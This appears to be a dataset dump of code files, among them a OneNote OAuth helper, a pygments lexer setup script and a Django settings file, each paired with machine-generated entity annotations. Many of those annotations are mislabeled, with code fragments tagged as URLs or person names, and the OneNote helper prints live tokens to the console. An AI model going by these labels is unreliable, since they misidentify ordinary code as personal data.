'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'Client.Us'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'i.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.mo'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc1.id'], ['URL', 'conn.ru'], ['URL', 'subnet1.id'], ['URL', 'reservation1.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc2.id'], ['URL', 'conn.ru'], ['URL', 'subnet2.id'], ['URL', 'reservation2.in'], ['URL', 'conn.ge'], ['URL', 'vpc1.id'], ['URL', 'reservations1.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'id.sh'], ['URL', 'vpc1.id'], ['URL', 'id.sh'], ['URL', 'subnet1.id'], ['URL', 'conn.ge'], ['URL', 'vpc2.id'], ['URL', 'reservations2.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'id.sh'], ['URL', 'vpc2.id'], ['URL', 'id.sh'], ['URL', 'subnet2.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'ip-10-0-0-1.ec2.int'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'network-interface.pr'], ['URL', 'ip-10-0-0-1.us-west-2.compute.int'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instances.sh'], ['URL', 'instance.id'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', 'instance.state.sh'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', '.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.re'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.re'], ['URL', 'instance.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'm1.sm'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'data.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group.id'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.in'], ['URL', 'type.sh'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'cidr.should.co'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.mo'], ['URL', 'client.ru'], ['URL', 'instance.should.co'], ['URL', 'instance.should.co'], ['URL', '.should.be.gr'], ['URL', '.should.be.gr'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'subnet.id'], ['URL', 'group1.na'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', '.id.sh'], ['URL', 'eni.id'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'instance.groups.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group1.id'], ['URL', 'boto.ec2.net'], ['URL', 'eni.id'], ['URL', 'conn.ru'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group1.id'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group2.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidAttachmentID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'address.sh'], ['URL', 'name.should.co'], ['URL', 'address.re'], ['URL', 'instance.pr'], ['URL', 'address.sh'], ['URL', 'instance.pr'], ['URL', 'name.should.co'], ['URL', 'instance.pr'], ['URL', 'address.re'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ke'], ['URL', 'name.sh'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'volume.cr'], ['URL', 'snapshot.sn'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'snapshot.sn'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'status.status.sh'], ['URL', 'status.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', '.id.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.de'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.st'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'name.sh'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', 's.id'], ['URL', 'instance1.id'], ['URL', 'status1.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance2.id'], ['URL', 'status2.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance3.id'], ['URL', 'status3.st'], ['URL', 'name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'conn.cr'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'group.in'], ['URL', 'instance.id'], ['URL', 'boto3.re'], ['URL', 'client.cr'], ['URL', '.should.be'], ['URL', 'instance.mo'], ['URL', '.should.be'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'instance.mo'], ['URL', 'optimized.should.be'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', '.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'response.should.have.ke'], ['URL', 'response.should.have.ke'], ['URL', '.should.be'], ['URL', 'client.de'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.re'], ['URL', 'ec2.cr']]"
69,"""""""
PyOneNote.py
~~~~~~~~~~~~~~~~~
This module contains a basic OAuth 2 Authentication and basic handler for GET and POST operations.
This work was just a quick hack to migrate notes from and old database to onenote but should hep you to understand
the request structure of OneNote.
Copyright (c) 2016 Coffeemug13. All rights reserved. Licensed under the MIT license.
See LICENSE in the project root for license information.
""""""
import requests
class OAuth():
""""""Handles the authentication for all requests""""""
def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None):
"""""" This information is obtained upon registration of a new Outlook Application
The values are just for information and not valid
:param client_id: ""cda3ffaa-2345-a122-3454-adadc556e7bf""
:param client_secret: ""AABfsafd6Q5d1VZmJQNsdac""
:param code: = ""PI:KEY""
:param token: = ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......""
:param rtoken: = ""MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......"" """"""
self.client_id = client_id
self.client_secret = client_secret
self.code = code
self.token = token
self.rtoken = refresh_token
self.redirect_uri = 'https://localhost'
self.session = requests.Session()
@staticmethod
def get_authorize_url(client_id):
""open this url in a browser to let the user grant access to onenote. Extract from the return URL your access code""
url = ""https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost"".format(
client_id)
return url
def get_token(self):
""""""
Make the following request with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:authorization_code
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
code:111111111-1111-1111-1111-111111111111
redirect_uri:https://localhost
OneNote will return as result:
{
""token_type"": ""bearer"",
""expires_in"": 3600,
""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"",
""access_token"": ""AxxdWR1DBAAUGCCXc8wU/...."",
""refresh_token"": ""DR3DDEQJPCiM2aACbIYa...."",
""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""
}
""""""
raise NotImplementedError("""")
def refresh_token(self):
""""""
Make the following reqest to refresh you token with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:refresh_token
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
refresh_token:DR3DDEQJPCiM2aACbIYa....
redirect_uri:https://localhost
-->
{
""token_type"": ""bearer"",
""expires_in"": 3600,
""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"",
""access_token"": ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW..."",
""refresh_token"": ""DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss..."",
""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""
}
""""""
url = 'https://login.live.com/oauth20_token.srf'
headers = {""Content-Type"": ""application/x-www-form-urlencoded""}
data = {""grant_type"": ""refresh_token"",
""client_id"": self.client_id,
""client_secret"": self.client_secret,
""refresh_token"": self.rtoken,
""redirect_uri"": self.redirect_uri}
result = self.session.post(url, headers=headers, data=data)
print(""Refreshed token: "" + result.text)
refresh = result.json()
self.expire = refresh.get('expires_in')
self.token = refresh.get('access_token')
self.rtoken = refresh.get('refresh_token')
print(""Token: "" + self.token)
print(""Refresh Token: "" + self.rtoken)
return True
def _get(self, url, query):
""""""Handles GET Request with Authentication""""""
headers = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
result = self.session.get(url, headers=headers, params=query)
print(""GET "" + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
def _post(self, url: str, headers: list, data: str = None, files: list = None):
""""""Handles POST Request with Authentication""""""
newHeaders = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
if data:
newHeaders.update(headers)
result = self.session.post(url, headers=newHeaders, data=data)
else:
result = self.session.post(url, headers=newHeaders, files=files)
# result.request.headers
print(""POST "" + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
def post(self, url: str, headers: list, data: str = None, files: list = None):
""""""post something and handle token expire transparent to the caller""""""
try:
result = self._post(url, headers, data=data, files=files)
if (result.status_code not in (200, 201)):
print(""Error: "" + str(result.status_code))
if (result.status_code == 401):
print(""Refreshing token"")
if self.refresh_token():
result = self._post(url, headers, data, files=files)
else:
print('Failed retry refreshing token')
return result
except Exception as e:
print(e)
pass
def get(self, url, query, headers=None):
""""""get something and handle token expire transparent to the caller""""""
try:
result = self._get(url, query)
if (result.status_code != requests.codes.ok):
print(""Error: "" + str(result.status_code))
if (result.status_code == 401):
print(""Refreshing token"")
if self.refresh_token():
result = self._get(url, query)
else:
print('Failed retry refreshing token')
return result
except Exception as e:
print(e)
pass
def get_credentials(self):
""""""Return the actual credentials of this OAuth Instance
:return client_id:""""""
return self.client_id, self.client_secret, self.code, self.token, self.rtoken
class OneNote(OAuth):
""""""This class wraps some OneNote specific calls""""""
def __init__(self, client_id, client_secret, code, token, rtoken):
super().__init__(client_id, client_secret, code, token, rtoken)
self.base = ""https://www.onenote.com/api/v1.0/me/""
def list_notebooks(self):
url = self.base + ""notes/notebooks""
query = {'top': '5'}
result = self.get(url, query)
n = None
if (result):
notebooks = result.json()
# result_serialized = json.dumps(result.text)
# notebook = json.loads(result_serialized)
n = notebooks[""value""][0]
x = 1
return n
def post_page(self, section_id: str, created, title: str, content: str, files: list = None):
""""""post a page. If you want to provide additional images to the page provide them as file list
in the same way like posting multipart message in 'requests'
.:param content: valid html text with Umlaute converted to ä""""""
url = self.base + ""notes/sections/"" + section_id + ""/pages""
headers = {""Content-Type"": ""application/xhtml+xml""}
# the basic layout of a page is always same
data = """"""
{0}
{2}
"""""".format(title, created, content)
result = None
if files:
""post as multipart""
newFiles = [('Presentation', (None, data, 'application/xhtml+xml', {'Content-Encoding': 'utf8'}))]
newFiles.extend(files)
result = self.post(url, {}, None, files=newFiles)
else:
""post as simple request""
result = self.post(url, headers, data)
n = None
if (result):
notebooks = result.json()
# result_serialized = json.dumps(result.text)
# notebook = json.loads(result_serialized)
# n = notebooks[""value""][0]
x = 1
return notebooks
",9316,"[['URL', 'https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost"".format'], ['URL', ""https://login.live.com/oauth20_token.srf'""], ['DATE_TIME', '2016'], ['PERSON', 'self.rtoken ='], ['PERSON', 'self.rtoken'], ['URL', 'self.se'], ['PERSON', 'self.rtoken'], ['URL', 'self.session.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'requests.co'], ['LOCATION', 'self.base'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'self.ge'], ['PERSON', 'Umlaute'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://www.onenote.com/api/v1.0/me/""'], ['URL', 'PyOneNote.py'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.red'], ['URL', 'self.se'], ['URL', 'requests.Se'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.red'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'refresh.ge'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'result.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.ba']]"
70,"""""""pygments-sisal module setup script for distribution.""""""
from __future__ import with_statement
import os
import setuptools
def get_version(filename):
with open(filename) as fh:
for line in fh:
if line.startswith('__version__'):
return line.split('=')[-1].strip()[1:-1]
setuptools.setup(
name='pygments-sisal',
version=get_version(os.path.join('pygments_sisal', '__init__.py')),
author='Alexander Asp Bock',
dummy@email.com',
platforms='All',
description=('A pygments lexer for SISAL'),
install_requires=['Pygments>=2.0'],
license='MIT',
keywords='pygments, lexer, sisal',
url='https://github.com/MisanthropicBit/pygments-sisal',
packages=setuptools.find_packages(),
long_description=open('README.md').read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5'
],
# Pygments entry point
entry_points=""[pygments.lexers]\n""
""sisal=pygments_sisal:SisalLexer""
)
",1467,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', ""Asp Bock'""], ['URL', ""https://github.com/MisanthropicBit/pygments-sisal',""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'line.st'], ['URL', 'setuptools.se'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'setuptools.fi'], ['URL', 'README.md']]"
71,"# -*- coding: utf-8 -*-
""""""
Django settings for saefacto project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
""""""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from os.path import join
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
from S3 import CallingFormat
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
# TODO: Fix this where even if in Dev this class is called.
pass
from configurations import Configuration, values
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
class Common(Configuration):
########## APP CONFIGURATION
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# 'suit',
# Admin
'django.contrib.admin',
'django.contrib.admindocs',
)
THIRD_PARTY_APPS = (
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'parsley',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'users', # custom users app
'core',
'main',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
INSTALLED_APPS += (
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django_user_agents.middleware.UserAgentMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = values.BooleanValue(False)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
